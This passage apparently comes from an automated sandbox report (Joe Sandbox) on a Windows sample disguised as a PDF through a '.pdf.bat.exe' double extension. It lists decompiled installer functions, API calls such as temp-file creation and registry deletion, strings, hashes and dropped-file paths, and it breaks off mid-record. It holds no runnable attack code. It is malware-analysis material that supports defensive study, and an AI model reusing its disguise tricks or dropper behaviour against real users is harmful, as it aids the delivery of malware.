                              • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                              Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 920 4032b9-4032d0 921 4032d2 920->921 922 4032d9-4032e1 920->922 921->922 923 4032e3 922->923 924 4032e8-4032ed 922->924 923->924 925 4032fd-40330a call 40349e 924->925 926 4032ef-4032f8 call 4034b4 924->926 930 403310-403314 925->930 931 403455 925->931 926->925 933 40331a-40333a GetTickCount call 406a70 930->933 934 40343e-403440 930->934 932 403457-403458 931->932 935 403497-40349b 932->935 946 403494 933->946 948 403340-403348 933->948 936 403442-403445 934->936 937 403489-40348d 934->937 939 403447 936->939 940 40344a-403453 call 40349e 936->940 941 40345a-403460 937->941 942 40348f 937->942 939->940 940->931 953 403491 940->953 944 403462 941->944 945 403465-403473 call 40349e 941->945 942->946 944->945 945->931 957 403475-403481 call 4060c3 945->957 946->935 950 40334a 948->950 951 40334d-40335b call 40349e 948->951 950->951 951->931 958 403361-40336a 951->958 953->946 963 403483-403486 957->963 964 40343a-40343c 957->964 960 403370-40338d call 406a90 958->960 966 403393-4033aa GetTickCount 960->966 967 403436-403438 960->967 963->937 964->932 968 4033f5-4033f7 966->968 969 4033ac-4033b4 966->969 967->932 972 4033f9-4033fd 968->972 973 40342a-40342e 968->973 970 4033b6-4033ba 969->970 971 4033bc-4033ed MulDiv wsprintfW call 4055a6 969->971 970->968 970->971 980 4033f2 971->980 974 403412-403418 972->974 975 4033ff-403404 call 4060c3 972->975 973->948 976 403434 973->976 979 40341e-403422 974->979 981 403409-40340b 975->981 976->946 979->960 982 403428 979->982 980->968 981->964 983 40340d-403410 981->983 982->946 983->979
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CountTick$wsprintf
                              • String ID: ... %d%%
                              • API String ID: 551687249-2449383134
                              • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                              • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                              • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                              • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9
                              Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 984 4068a5-4068c5 GetSystemDirectoryW 985 4068c7 984->985 986 4068c9-4068cb 984->986 985->986 987 4068dc-4068de 986->987 988 4068cd-4068d6 986->988 990 4068df-406912 wsprintfW LoadLibraryExW 987->990 988->987 989 4068d8-4068da 988->989 989->990
                              APIs
                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                              • wsprintfW.USER32 ref: 004068F7
                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%S.dll$UXTHEME
                              • API String ID: 2200240437-1106614640
                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                              • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                              • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8
                              Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 991 402eae-402ed7 call 40638e 993 402edc-402ee0 991->993 994 402f91-402f95 993->994 995 402ee6-402eea 993->995 996 402eec-402f0d RegEnumValueW 995->996 997 402f0f-402f22 995->997 996->997 998 402f76-402f84 RegCloseKey 996->998 999 402f4b-402f52 RegEnumKeyW 997->999 998->994 1000 402f24-402f26 999->1000 1001 402f54-402f66 RegCloseKey call 406915 999->1001 1000->998 1003 402f28-402f3c call 402eae 1000->1003 1006 402f86-402f8c 1001->1006 1007 402f68-402f74 RegDeleteKeyW 1001->1007 1003->1001 1009 402f3e-402f4a 1003->1009 1006->994 1007->994 1009->999
                              APIs
                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CloseEnum$DeleteValue
                              • String ID:
                              • API String ID: 1354259210-0
                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                              • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                              • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                              Function 701D1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1010 701d1817-701d1856 call 701d1bff 1014 701d185c-701d1860 1010->1014 1015 701d1976-701d1978 1010->1015 1016 701d1869-701d1876 call 701d2480 1014->1016 1017 701d1862-701d1868 call 701d243e 1014->1017 1022 701d1878-701d187d 1016->1022 1023 701d18a6-701d18ad 1016->1023 1017->1016 1026 701d187f-701d1880 1022->1026 1027 701d1898-701d189b 1022->1027 1024 701d18cd-701d18d1 1023->1024 1025 701d18af-701d18cb call 701d2655 call 701d1654 call 701d1312 GlobalFree 1023->1025 1028 701d191e-701d1924 call 701d2655 1024->1028 1029 701d18d3-701d191c call 701d1666 call 701d2655 1024->1029 1051 701d1925-701d1929 1025->1051 1032 701d1888-701d1889 call 701d2b98 1026->1032 1033 701d1882-701d1883 1026->1033 1027->1023 1030 701d189d-701d189e call 701d2e23 1027->1030 1028->1051 1029->1051 1045 701d18a3 1030->1045 1042 701d188e 1032->1042 1034 701d1885-701d1886 1033->1034 1035 701d1890-701d1896 call 701d2810 1033->1035 1034->1023 1034->1032 1050 701d18a5 1035->1050 1042->1045 1045->1050 1050->1023 1054 701d192b-701d1939 call 701d2618 1051->1054 1055 701d1966-701d196d 1051->1055 1060 701d193b-701d193e 1054->1060 1061 701d1951-701d1958 1054->1061 1055->1015 1057 701d196f-701d1970 GlobalFree 1055->1057 1057->1015 1060->1061 1062 701d1940-701d1948 1060->1062 1061->1055 1063 701d195a-701d1965 call 701d15dd 1061->1063 1062->1061 1064 701d194a-701d194b FreeLibrary 1062->1064 1063->1055 1064->1061
                              APIs
                                • Part of subcall function 701D1BFF: GlobalFree.KERNEL32(?), ref: 701D1E74
                                • Part of subcall function 701D1BFF: GlobalFree.KERNEL32(?), ref: 701D1E79
                                • Part of subcall function 701D1BFF: GlobalFree.KERNEL32(?), ref: 701D1E7E
                              • GlobalFree.KERNEL32(00000000), ref: 701D18C5
                              • FreeLibrary.KERNEL32(?), ref: 701D194B
                              • GlobalFree.KERNEL32(00000000), ref: 701D1970
                                • Part of subcall function 701D243E: GlobalAlloc.KERNEL32(00000040,?), ref: 701D246F
                                • Part of subcall function 701D2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701D1896,00000000), ref: 701D28E0
                                • Part of subcall function 701D1666: wsprintfW.USER32 ref: 701D1694
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23458769275.00000000701D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701D0000, based on PE: true
                              • Associated: 00000000.00000002.23458693520.00000000701D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458842667.00000000701D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000000.00000002.23458916927.00000000701D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc$Librarywsprintf
                              • String ID:
                              • API String ID: 3962662361-3916222277
                              • Opcode ID: ed49373483d13b044f2d143158f1c1b97c9a268421fe991850aed9b2d352d19e
                              • Instruction ID: 675dd0ab337727b9314d215937905a1915e9af80f9df7d85d8d67f5bd707331f
                              • Opcode Fuzzy Hash: ed49373483d13b044f2d143158f1c1b97c9a268421fe991850aed9b2d352d19e
                              • Instruction Fuzzy Hash: A541E272900201BFDB059F30DC94B8E37BCAF14314F1544A9FE16AA786DBB4E484D760
                              Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1067 406040-40604c 1068 40604d-406081 GetTickCount GetTempFileNameW 1067->1068 1069 406090-406092 1068->1069 1070 406083-406085 1068->1070 1072 40608a-40608d 1069->1072 1070->1068 1071 406087 1070->1071 1071->1072
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040605E
                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-944333549
                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                              • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                              • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                              Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,C:\Users\user\AppData\Local\Temp\nsp919B.tmp,76BF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"), ref: 00405EA9
                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\polaritets,?,00000000,000000F0), ref: 00401652
                              Strings
                              • C:\Users\user\polaritets, xrefs: 00401645
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                              • String ID: C:\Users\user\polaritets
                              • API String ID: 1892508949-1397053051
                              • Opcode ID: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                              • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                              • Opcode Fuzzy Hash: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                              • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                              Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                              • RegCloseKey.KERNELBASE(?), ref: 00406440
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: Call
                              • API String ID: 3356406503-1824292864
                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                              Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                              • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                              • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                              • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                              Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                              • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                              • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                              • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                              Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                              • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                              • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                              • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                              Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                              • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                              • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                              • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                              Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                              • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                              • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                              • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                              Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
